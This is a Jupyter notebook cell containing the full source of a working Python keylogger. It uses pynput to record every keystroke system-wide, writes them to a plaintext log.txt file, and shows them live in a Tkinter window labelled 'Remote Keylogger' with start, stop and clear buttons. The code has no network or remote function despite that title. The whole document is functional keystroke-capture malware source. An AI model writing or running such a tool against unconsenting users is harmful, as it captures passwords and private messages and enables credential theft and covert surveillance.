In [2]:
import tkinter as tk
from tkinter import scrolledtext, messagebox
from pynput.keyboard import Key, Listener
import threading

keys = []
listener = None
logging = False

# ---------------- KEYLOGGER FUNCTIONS ---------------- #
def on_press(key):
    keys.append(key)
    write_file(keys)

def write_file(keys):
    with open('log.txt', 'a') as f:
        for key in keys:
            k = str(key).replace("'", "")
            if k == 'Key.space':
                f.write(' ')
                update_text(' ')
            elif k.startswith('Key'):
                f.write(f'[{k}]')
                update_text(f'[{k}]')
            else:
                f.write(k)
                update_text(k)
        keys.clear()

def on_release(key):
    if key == Key.esc:
        return False  # Stop listener

def start_keylogger():
    global listener, logging
    if not logging:
        logging = True
        listener = Listener(on_press=on_press, on_release=on_release)
        t = threading.Thread(target=listener.start, daemon=True)
        t.start()
        log_text.insert(tk.END, "Keylogger started...\n")
    else:
        messagebox.showinfo("Info", "Keylogger is already running!")

def stop_keylogger():
    global listener, logging
    if logging and listener is not None:
        listener.stop()
        logging = False
        log_text.insert(tk.END, "\nKeylogger stopped.\n")
    else:
        messagebox.showinfo("Info", "Keylogger is not running!")

# ---------------- GUI FUNCTIONS ---------------- #
def update_text(new_text):
    log_text.insert(tk.END, new_text)
    log_text.see(tk.END)  # Auto-scroll

def clear_log():
    log_text.delete(1.0, tk.END)
    open("log.txt", "w").close()  # Clear log file

# ---------------- TKINTER GUI ---------------- #
root = tk.Tk()
root.title("Keylogger Tool")
root.geometry("600x400")
root.config(bg="#222")

title_label = tk.Label(root, text="Remote Keylogger", font=("Arial", 18, "bold"), bg="#222", fg="white")
title_label.pack(pady=10)

log_text = scrolledtext.ScrolledText(root, wrap=tk.WORD, width=70, height=15, font=("Consolas", 10))
log_text.pack(pady=10)

btn_frame = tk.Frame(root, bg="#222")
btn_frame.pack(pady=10)

start_btn = tk.Button(btn_frame, text="Start", command=start_keylogger, bg="#4CAF50", fg="white", font=("Arial", 12), width=10)
start_btn.grid(row=0, column=0, padx=5)

stop_btn = tk.Button(btn_frame, text="Stop", command=stop_keylogger, bg="#F44336", fg="white", font=("Arial", 12), width=10)
stop_btn.grid(row=0, column=1, padx=5)

clear_btn = tk.Button(btn_frame, text="Clear Log", command=clear_log, bg="#2196F3", fg="white", font=("Arial", 12), width=10)
clear_btn.grid(row=0, column=2, padx=5)

exit_btn = tk.Button(btn_frame, text="Exit", command=root.quit, bg="#9C27B0", fg="white", font=("Arial", 12), width=10)
exit_btn.grid(row=0, column=3, padx=5)

root.mainloop()
